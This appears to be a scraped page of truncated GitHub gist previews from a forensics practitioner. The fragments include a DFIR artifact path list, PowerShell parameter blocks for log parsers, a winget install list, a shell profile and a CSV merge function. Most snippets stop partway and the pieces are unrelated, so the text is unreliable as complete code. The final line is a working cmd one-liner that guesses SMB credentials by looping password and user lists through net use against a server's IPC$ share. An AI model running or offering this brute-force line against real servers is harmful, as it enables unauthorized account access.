This is a list of forensic artifacts that can be used by DFIR community to perform cyber investigations.
- XP - c:\windows\setupapi.log
- W7+ - c:\windows\inf\setupapi.dev.log
- c:$Recycle.Bin*
- c:\Recycler*
[CmdletBinding()] | |
param | |
( | |
[Parameter(Mandatory = $true, | |
Position = 1, | |
HelpMessage = 'Specify the Microsoft Defender MPLog file to parse.')] | |
[String]$InputFile, | |
[Parameter(Mandatory = $true, | |
Position = 2, | |
HelpMessage = 'Specify the folder where the output file will be placed.')] |
<# | |
.SYNOPSIS | |
Convert PowerShell ConsoleHost_history.txt files from the specified Source Directory into a single CSV file. | |
Original script to copy the ConsoleHost_history.txt files from Andrew Rathbun and Matt Arbaugh: https://github.com/AndrewRathbun/DFIRPowerShellScripts/blob/main/Move-KAPEConsoleHost_history.ps1 | |
.PARAMETER InputDir | |
Specify the folder which contains the ConsoleHost_history.txt file(s). Ideally, the C:\ or C:\Users|Utilisateurs|Usuarios|Benutzer directory in order to grab the file(s) from all users. | |
.PARAMETER Destination | |
Specify the folder where the ConsoleHost_histories.csv file will be placed. |
import csv | |
import yaml | |
import argparse | |
import os | |
import sys | |
filenames = [] | |
def main(): |
mkdir c:\github | |
winget install --id=Git.Git -e --accept-package-agreements --accept-source-agreements | |
winget install --id=Microsoft.VisualStudioCode -e | |
winget install --id=AgileBits.1Password -e | |
winget install --id=7zip.7zip -e | |
winget install --id=Twilio.Authy -e | |
winget install --id=Bethesda.Launcher -e | |
winget install --id=Microsoft.Bicep -e | |
winget install --id=Microsoft.bitsmanager -e | |
winget install --id=BrutalChess.BrutalChess -e |
oh-my-posh init pwsh --config "$env:POSH_THEMES_PATH\powerlevel10k_rainbow.omp.json" | Invoke-Expression | |
Import-Module -Name Terminal-Icons | |
Set-PSReadLineOption -PredictionViewStyle ListView | |
Set-PSReadLineOption -PredictionSource history |
# Usage: Merge-CSVFiles | |
# Usage: Merge-CSVFiles -Path C:\files\to\merge\ -Filter "*.csv" -OutputFile C:\Temp\merged.csv | |
# Combination of https://declanbright.com/downloads/Combine-Files.ps1 and https://gallery.technet.microsoft.com/scriptcenter/CombineMerge-multiple-CSV-23a53e83 | |
function Merge-CSVFiles { | |
[cmdletbinding()] | |
param( | |
[string]$Path = ".", | |
[string]$Filter = "*.csv", | |
[string]$OutputFile = "c:\Temp\Merged_$(get-date -f yyyy-MM-dd_HHmmss).csv" |
@FOR /F %p in (pass.txt) DO @FOR /F %n in (users.txt) DO @net use \\SERVERIP\IPC$ /user:DOMAIN\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\SERVERIP\IPC$ > NUL |